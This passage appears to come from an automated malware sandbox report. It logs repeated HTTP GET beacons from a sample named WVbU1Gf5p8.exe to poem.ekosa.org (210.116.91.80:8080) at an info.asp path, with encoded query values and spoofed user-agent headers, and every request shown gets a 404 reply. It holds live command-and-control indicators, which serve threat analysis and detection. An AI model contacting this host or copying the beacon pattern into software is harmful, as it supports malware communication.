      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      272192.168.2.450052210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:34.868999004 CET5327OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:35.131473064 CET5327INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:35 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      273192.168.2.450053210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:35.851495981 CET5328OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:36.114909887 CET5328INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:35 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      274192.168.2.450054210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:36.384987116 CET5329OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:36.649343967 CET5330INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:36 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      275192.168.2.450055210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:36.917159081 CET5330OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:37.174726009 CET5331INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:36 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      276192.168.2.450056210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:37.555005074 CET5332OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:37.816874981 CET5332INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:37 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      277192.168.2.450057210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:38.085321903 CET5333OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:38.348088026 CET5333INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:37 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      278192.168.2.450058210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:38.628407001 CET5334OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:38.896718025 CET5335INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:38 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      279192.168.2.450059210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:39.297255039 CET5335OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:39.567338943 CET5336INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:38 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      28192.168.2.449792210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:13.708411932 CET399OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:13.967778921 CET411INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:13 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      280192.168.2.450060210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:39.845774889 CET5337OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:57:40.118158102 CET5337INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:57:39 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      281192.168.2.450061210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:57:40.390743971 CET5338OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
